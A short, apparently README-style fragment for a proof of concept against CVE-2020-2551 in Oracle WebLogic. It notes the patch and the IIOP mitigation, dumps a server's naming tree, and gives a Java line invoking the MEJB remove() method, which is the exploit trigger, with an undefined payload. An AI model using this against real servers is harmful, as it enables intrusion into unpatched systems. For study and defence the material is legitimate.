1、CVE-2020-2551
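Python proof-of-concept example for CVE-2020-2551, a deserialization flaw in Oracle WebLogic Server reachable over IIOP. Oracle fixed it in the January 2020 Critical Patch Update; where IIOP is not needed, disabling it or filtering access to the listen port removes the exposure.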
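2、You know what to do
The JSON below appears to be the server's naming tree as returned over IIOP: each entry gives the bound object's class and interfaces, and "error msg" marks the contexts that answered with org.omg.CORBA.NO_PERMISSION.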
{
"ejb": {
"class": "com.sun.jndi.cosnaming.CNCtx",
"interfaces": [
"javax.naming.Context"
],
"mgmt": {
"MEJB": {
"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
"interfaces": []
},
"class": "com.sun.jndi.cosnaming.CNCtx",
"interfaces": [
"javax.naming.Context"
]
}
},
"javax": {
"class": "com.sun.jndi.cosnaming.CNCtx",
"error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
"interfaces": [
"javax.naming.Context"
]
},
"jdbc": {
"class": "com.sun.jndi.cosnaming.CNCtx",
"db_xf": {
"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
"interfaces": []
},
"interfaces": [
"javax.naming.Context"
]
},
"mejbmejb_jarMejb_EO": {
"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
"interfaces": []
},
"weblogic": {
"class": "com.sun.jndi.cosnaming.CNCtx",
"error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
"interfaces": [
"javax.naming.Context"
]
}
}
3、ejb
/bea_wls_internal/classes/mejb@/
weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)
4、jta
// Resolves the "ejb/mgmt/MEJB" binding and calls its remove(Object) method with `jta`.
// Neither `x` (the naming context) nor `jta` is defined in this snippet.
// NOTE(review): presumably `jta` is the object the PoC builds elsewhere; confirm against the full script.
x.lookup("ejb/mgmt/MEJB").remove(jta);